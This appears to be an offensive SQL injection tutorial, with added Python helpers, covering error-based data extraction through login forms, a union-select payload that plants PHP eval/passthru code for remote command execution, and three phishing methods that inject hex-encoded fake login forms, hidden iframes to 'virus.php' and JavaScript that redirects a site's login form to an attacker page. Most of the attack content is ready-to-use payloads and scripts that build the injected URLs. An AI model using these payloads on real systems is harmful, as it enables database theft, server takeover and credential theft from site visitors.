#0x10 ~ Update

I take this opportunity to update this complete paper.

#0x10.a ~ Bypassing Logins Advanced

I hope you enjoyed reading the "Bypassing Logins" chapter. So now it is time to learn how to pull data out of the database behind a vulnerable login form.

Suppose the login is built by one of these two queries (the first wraps the user input in double quotes, the second in single quotes):

```sql
select username,pass from users where username="$uname" and password="$passwrd" limit 0,1
select username,pass from users where username='$uname' and password='$passwrd' limit 0,1
```

Code (enter one of these as the username; pick the quote that matches the query, and the terminator the application lets through):

```
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
```

Note that MySQL only treats `--` as a comment when it is followed by a space, so the last two variants need a trailing space after `--` in the form field (in a URL write `--+`, the `+` decodes to a space).

You can leave the password field empty again. Now let's see what query gets passed:

```sql
select username,pass from users where username='' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='' and password='' limit 0,1
```

Why this leaks data: `rand(0)` is seeded, so `floor(rand(0)*2)` produces the same deterministic 0/1 sequence on every row, and the `group by y` over the derived table ends up inserting the same key twice. MySQL then aborts with an error like `Duplicate entry 'dbname:1' for key 'group_key'`, and the part before the `:` (the `0x3a`) is the result of the inner `select database()`. As long as the application echoes `mysql_error()`, you read the value straight from the error page; replace `(select database())` with any other subquery that returns one row to read other values the same way.

#0x10.b ~ RFI with SQL Injection

If you have read this far and understand RFI vulnerabilities, this needs no explanation. It's easy!

```
site.com/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');
```

The union-selected string is rendered into the page, and when that page is pulled in through the remote file inclusion hole the PHP inside it is executed, running whatever `cmd` carries. Two practical caveats: the `<?` short tag only works where `short_open_tag` is enabled (use `<?php` otherwise), and the unquoted `$_request[cmd]` relies on PHP falling back from an undefined constant to the string `'cmd'`, which raises a notice but works.
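The error-based login payloads above, as an added example that is not part of the original paper: a small Python script that builds the 0x10.a username values for each quote/terminator combination, parses the leaked value out of the `Duplicate entry` error the technique depends on, and shows the same input bound as a parameter instead of concatenated. It generalises the page slightly by letting any scalar subquery stand in for `(select database())`. The sample error text and the `shop_db` database name are constructed for the demo, and `sqlite3` is used only so the parameterised query runs offline (the target in the text is MySQL).

```python
import re
import sqlite3

# Added example (not the page's code). Builds the 0x10.a error-based payloads for the
# page's login form, extracts the leaked value from the MySQL error the page relies on,
# and contrasts the vulnerable string-built query with a parameterised one.


def error_based_expr(subquery="(select database())"):
    """The double-query trick from the page: rand(0) is deterministic, so 'group by y'
    over the derived table sees the same key twice and MySQL aborts with
    'Duplicate entry <subquery result>:1 for key ...'. Generalised beyond the page:
    any scalar subquery can replace (select database())."""
    return ("(select 1 from (select count(*),concat(%s,0x3a,floor(rand(0)*2))y "
            "from information_schema.tables group by y)x)" % subquery)


def login_payload(quote="'", terminator="and", subquery="(select database())"):
    """Username value to submit. quote is whatever the vulnerable query wraps $uname in.
    terminator 'and' re-balances the quotes with and ''='' as the page does; '--+', '#'
    and '-- ' instead comment the rest of the query away (MySQL needs a space after --)."""
    expr = error_based_expr(subquery)
    if terminator == "and":
        return "%s or %s and %s%s=%s" % (quote, expr, quote, quote, quote)
    return "%s or %s %s" % (quote, expr, terminator)


def vulnerable_query(uname, passwrd, quote="'"):
    """String concatenation exactly as the page's PHP does it."""
    return ("select username,pass from users where username=%s%s%s and password=%s%s%s "
            "limit 0,1" % (quote, uname, quote, quote, passwrd, quote))


# MySQL 5.x wording for error 1062 coming out of the derived table; 8.x prints
# '<group_key>' instead of 'group_key', which the regex also accepts.
DUPLICATE_RE = re.compile(r"Duplicate entry '(.*):[01]' for key '")


def extract_leak(error_text):
    """Pull the value that concat() put in front of the 0x3a (':') out of the error."""
    m = DUPLICATE_RE.search(error_text)
    return m.group(1) if m else None


# Constructed sample of the error an unpatched page would echo via mysql_error();
# 'shop_db' is an assumed database name, not one from the page.
SAMPLE_ERROR = "Duplicate entry 'shop_db:1' for key 'group_key'"


def safe_lookup(uname, passwrd):
    """Parameterised lookup (sqlite3 used here so it runs offline): the payload is bound
    as data, the subquery is never parsed as SQL, and the login simply fails."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(username text, password text)")
    con.execute("insert into users values('admin', 's3cret')")
    row = con.execute(
        "select username,password from users where username=? and password=? limit 1",
        (uname, passwrd),
    ).fetchone()
    con.close()
    return row


if __name__ == "__main__":
    for q in ("'", '"'):
        for term in ("and", "--+", "#"):
            print(login_payload(q, term))
    print(vulnerable_query(login_payload(), ""))
    print("leaked:", extract_leak(SAMPLE_ERROR))
    print("safe:", safe_lookup(login_payload(), ""))
```

`vulnerable_query(login_payload(), "")` reproduces the exact query the text shows being passed to MySQL; `safe_lookup` with the same payload returns no row, because a bound parameter cannot change the statement's structure.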
#0x10.c ~ URL Spoofing Phishing

This time the title says it all: we will use an SQL injection vulnerability for phishing by URL spoofing. There are three methods. In each one we push the payload through the SQL injection and add some extra code to the web page, just as in XSS.

1. Injecting HTML

For simplicity we hex-encode the payload: a `0x...` literal contains no quotes, so it cannot be broken by `addslashes()`/magic quotes and can be dropped straight into a union select column. The payload:

```html
<form action=http://site.com/w0rm.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit"></form>
<iframe height=0 width=0>
```

Encoded as hex:

```
3c666f726d20616374696f6e3d687474703a2f2f736974652e636f6d2f7730726d2e706870206d6574686f643d22504f5354223e0d0a557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e0d0a50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e0d0a3c696e70757420747970653d227375626d6974223e0d0a3c2f666f726d3e0d0a3c696672616d65206865696768743d302077696474683d303e
```

Inject `0x` followed by that hex as the value of the column your SQL injection echoes on the page.

2. Injecting an iframe

For example:

```html
<br><iframe src="http://site.com/virus.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>
```

Code:

```
3c62723e3c696672616d65207372633d22687474703a2f2f736974652e636f6d2f76697275732e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--
```

URL:

```
site.com/link.php?id=-1'+union+select+1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f736974652e636f6d2f76697275732e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--
```

3. Changing the current form

In this attack we inject javascript into the site that changes the action of the site's current login form to the link of our fake login page:

```html
<script>document.getElementsByTagName("form")[0].action="http://www.site.com/virus.php"</script>
```

Code:

```
3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636f6d2f76697275732e706870223c2f7363726970743e
```

URL:

```
site.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636f6d2f76697275732e706870223c2f7363726970743e,4,5--
```

In all three URLs `-1` makes the original row empty so the union row is what gets rendered, the hex literal goes into whichever of the five columns is echoed (column 3 here), and the trailing `--` needs a space after it to be a comment in MySQL, so in practice write `--+` at the end of the URL.
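The hex-encoding and union-select URL construction from the three phishing methods above, as an added example that is not part of the original paper: it converts each payload into a MySQL `0x...` literal, checks that the hex dumps printed on the page decode back to the stated payloads, and assembles the `link.php?id=-1'+union+select+...` URL with the payload in the echoed column. `site.com`, `link.php`, `virus.php` and the five-column/third-column layout are the page's placeholders, not real targets.

```python
import binascii

# Added example (not the page's code): hex-encodes the three 0x10.c payloads into MySQL
# 0x... literals, checks the page's own hex dumps decode back to the payloads, and builds
# the union-select URL. site.com, link.php and the 5-column/3rd-column layout are the
# page's placeholder examples, not real targets.

# Payloads from the page; the form payload keeps the CRLF line breaks its hex dump contains.
FORM_PAYLOAD = (
    '<form action=http://site.com/w0rm.php method="POST">\r\n'
    'Username : <input type="text" name="username"><br>\r\n'
    'Password :<input type="text" name="password">\r\n'
    '<input type="submit">\r\n'
    '</form>\r\n'
    '<iframe height=0 width=0>'
)
IFRAME_PAYLOAD = ('<br><iframe src="http://site.com/virus.php" height=300 width=300 '
                  'frameBorder="0" scrolling="no"></iframe>')
SCRIPT_PAYLOAD = ('<script>document.getElementsByTagName("form")[0].action='
                  '"http://www.site.com/virus.php"</script>')

# The hex the page prints for the iframe and script payloads, rejoined into one string.
PAGE_IFRAME_HEX = (
    "3c62723e3c696672616d65207372633d22687474703a2f2f736974652e636f6d2f76697275732e70"
    "687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022"
    "207363726f6c6c696e673d226e6f223e3c2f696672616d653e"
)
PAGE_SCRIPT_HEX = (
    "3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d65282266"
    "6f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636f6d2f766972"
    "75732e706870223c2f7363726970743e"
)


def hex_literal(text):
    """MySQL 0x... string literal: no quotes in it, so it survives addslashes /
    magic_quotes and sits directly in a union select column."""
    return "0x" + binascii.hexlify(text.encode("utf-8")).decode("ascii")


def decode_hex_literal(lit):
    """Reverse of hex_literal, accepting the literal with or without its 0x prefix."""
    return binascii.unhexlify(lit[2:] if lit.startswith("0x") else lit).decode("utf-8")


def union_url(base, param, columns, visible, payload, quote="'", comment="--+"):
    """id=-1 empties the original result so the union row is what the page renders;
    the payload goes into the column number the page actually echoes. Spaces become
    '+' as in the page's URLs, so the default '--+' decodes server-side to '-- '
    (MySQL ignores '--' without a following space)."""
    cols = [str(i) for i in range(1, columns + 1)]
    cols[visible - 1] = hex_literal(payload)
    injected = "-1%s union select %s%s" % (quote, ",".join(cols), comment)
    return "%s?%s=%s" % (base, param, injected.replace(" ", "+"))


if __name__ == "__main__":
    for name, payload in (("form", FORM_PAYLOAD), ("iframe", IFRAME_PAYLOAD),
                          ("script", SCRIPT_PAYLOAD)):
        print(name, union_url("http://site.com/link.php", "id", 5, 3, payload))
```

Running it prints the three injected URLs; the iframe one is character-for-character the page's `link.php` example except for the `--+` terminator, which is the form that actually comments out the rest of the query once the URL is decoded.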